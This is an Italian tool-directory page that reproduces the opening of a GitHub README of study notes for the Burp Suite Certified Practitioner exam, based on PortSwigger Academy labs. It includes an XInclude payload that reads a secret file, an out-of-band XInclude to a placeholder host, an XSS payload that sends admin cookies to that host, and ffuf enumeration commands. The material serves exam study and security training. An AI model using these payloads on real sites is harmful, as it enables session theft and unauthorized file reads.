Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — Note di studio pratiche e guide passo-passo per i laboratori di PortSwigger Academy, che coprono vulnerabilità web, payload, enumerazione e strategie per l'esame BSCP. | Kitploit
Strumenti/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingApprendimento e FormazioneRisorse CurateSviluppo Payload
Percorsi e Corsi
Lab e Pratica
Top in Percorsi e Corsi n.9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

Note di studio pratiche e guide passo-passo per i laboratori di PortSwigger Academy, che coprono vulnerabilità web, payload, enumerazione e strategie per l'esame BSCP.

Vedi Repository
1.5k3851681 mese faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Preparazione all'Esame Burp Suite Certified Practitioner

Questi sono i miei appunti di studio con oltre 110 laboratori della PortSwigger Academy. Ho usato questi laboratori per superare l'esame Burp Suite Certified Practitioner del 2023. La mia certificazione BSCP.
Per maggiori informazioni, visita PortSwigger Academy e consulta i materiali di apprendimento più recenti.


SCANSIONE - Enumerazione
Scansione mirata
Scansione di entità non standard

PUNTO D'APPOGGIO - Fase 1
Scoperta dei contenuti
DOM-XSS
XSS Cross Site Scripting
Avvelenamento della cache web
Header Host
HTTP Request Smuggling
Brute force
Autenticazione

ESCALATION DEI PRIVILEGI - Fase 2
CSRF - Presa di controllo dell'account
Reimpostazione della password
SQLi - SQL Injection
JWT - JSON Web Tokens
Prototype pollution
Test delle API
Controllo degli accessi
Endpoint API GraphQL
CORS - Cross-origin resource sharing

ESFILTRAZIONE DEI DATI - Fase 3
XXE - Entità XML e Iniezioni
SSRF - Server side request forgery
SSTI - Server side template injection
SSPP - Server Side Prototype Pollution
LFI - File path traversal
Caricamento dei file
Deserializzazione
OS Command Injection

APPENDICE
Script Python
Payload
Wordlist
Scansione mirata del target
Approccio
Contenuti formativi extra

I miei consigli su Burp

Raccomando di svolgere quante più possibili Mystery lab challenge per mettere alla prova le tue abilità e ridurre il tempo necessario a identificare le vulnerabilità, prima di sostenere l'esame.
Ho trovato molto informativo anche questo consiglio di PortSwigger su Ripetere l'esame.
Guarda CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks per una nuova prospettiva sull'esame BSCP nel 2024.




Buy Me A Coffee

Grazie per il caffè di supporto, \o/

Il mio certificato Burp Suite Certified Practitioner.


Scansione

L'enumerazione delle applicazioni web inizia con una scansione iniziale e mirata in un contesto con tempi limitati.

Scansione mirata
Scansione di entità non standard

Scansione mirata

A causa del limite di tempo stringente durante gli incarichi o l'esame, scansiona i punti di inserimento definiti per richieste specifiche.

scan-defined-insertion-points

Lo scanner ha rilevato una vulnerabilità di XML injection nel parametro storeId, che ha portato alla lettura del file segreto di Carlos.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Richiesta XInclude fuori banda, serve un DTD ospitato per leggere il file locale.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Scoprire le vulnerabilità rapidamente con la scansione mirata

Scansione di strutture dati non standard

Scansione di strutture dati non standard utilizzando la funzione di Burp per scansionare il punto di inserimento selezionato alla ricerca di testo selezionato nella risposta o nelle richieste.

scan-selected-insertion-point

Identifica la vulnerabilità attraverso i risultati dei problemi dello scanner Burp.
In questo caso, utilizzando l'XSS identificato, ruba i cookie dell'utente admin creando il payload nel punto di inserimento identificato.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>Codifica in URL i caratteri chiave.  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>Usa il cookie dell'utente admin per accedere al pannello di amministrazione sostituendolo nella sessione corrente del browser.  

[PortSwigger Lab: Scansione di strutture dati non standard](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# Punto d'ingresso  
  
# Scoperta dei contenuti  

>L'enumerazione del target inizia con il fuzzing di directory e file web. Si possono usare gli strumenti di engagement di Burp, l'opzione di scoperta dei contenuti per trovare percorsi e file nascosti, oppure usare `FFUF` per enumerare directory e file web. Anche l'esame di `robots.txt` o `sitemap.xml` può rivelare contenuti.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Strumento di engagement di Burp, content discovery utilizzando la mia wordlist compilata burp-labs-wordlist come elenco di file personalizzato.

content-discovery.png

Scarica lo strumento